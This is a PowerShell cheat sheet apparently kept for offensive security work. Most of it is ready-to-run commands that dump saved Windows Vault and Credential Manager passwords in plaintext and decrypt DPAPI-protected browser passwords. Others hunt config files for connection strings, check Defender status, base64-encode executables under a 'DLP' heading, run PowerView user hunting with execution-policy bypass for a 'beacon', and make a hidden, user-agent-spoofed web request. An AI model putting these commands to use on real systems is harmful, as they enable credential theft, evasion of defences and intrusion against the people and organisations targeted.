Powershell4infosec.txt

1. # Install module
2. Install-Module AADInternals
3. Install-Module -Name CredentialManager
4. Install-Module -Name BetterCredentials
5.  
6. # Import the module
7. Import-Module AADInternals
8.  
9.  
10. Install-Module -Name AzureAD
11. Install-Module MSOnline
12.  
13. Install-Module PSReadline -AllowPrerelease
14. Install-Module -Name Az.Tools.Predictor
15. import-module Az.Tools.Predictor
16. Set-PSReadLineOption -PredictionSource HistoryAndPlugin
17. Set-PSReadLineOption -PredictionViewStyle ListView
18.  
19. #####
20. Get-ADObject -Filter * -SearchBase "CN=Sites,CN=Configuration,DC=domain,DC=com" -SearchScope OneLevel | % { "Site Name: $($.Name)",((Get-Acl "AD:\$").Access | select IdentityReference,ActiveDirectoryRights | fl) }
21. ######
22.  
23.  
24.  
25.  
26. # Content: Receive Credentials from IE & Edge
27. [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
28. $vault = New-Object Windows.Security.Credentials.PasswordVault
29. $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password
30.  
31. [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }
32.  
33. Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); }
34.  
35. Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | ForEach-Object {if($($_.displayName) -eq "Windows Defender"){if("$($([Convert]::ToString($($_.productState), 16)).PadLeft(6,""0""))".Substring(2,1) -eq "1"){Write-Host "Windows Defender is Enabled"}else{Write-Host "Windows Defender is Disabled"}}}
36.  
37. gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString"
38.  
39. gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue
40.  
41. [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser))
42.  
43.  
44.  
45.  
46.  
47. ###DLP
48. [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\file.exe")) | Out-File -Encoding ASCII C:\Temp\file.txt
49.  
50.  
51.  
52.  
53.  
54. PowerVeiw and output localy to disk for beacon:
55.   powershell -no -exec bypass -command "& {Import-Module .\PowerView.ps1; Invoke-UserHunter USRNAME | Out-File -Encoding Ascii USERNAME.txt}"
56.  
57. Powerview UserHunting Search by keyword:
58.   powershell Get-NetUser -Filter "(description=*medical*)" | Select-Object -Prop samaccountname.description,title
59.   powershell Get-NetUser -Filter "(title=*medical*)" | Select-Object -Prop samaccountname.description,title
60.  
61. Simple Web request:
62.   powershell.exe -w hidden -command $wc = New-Object System.Net.Webclient; $wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64;Trident/7.0; AS; rv:11.0) Like Gecko'); $wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; $wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.downloadstring('http://google.com/')
63.  
64.  
65.  
66.  
67.  
68.  
69.  
70.  
71.  
72.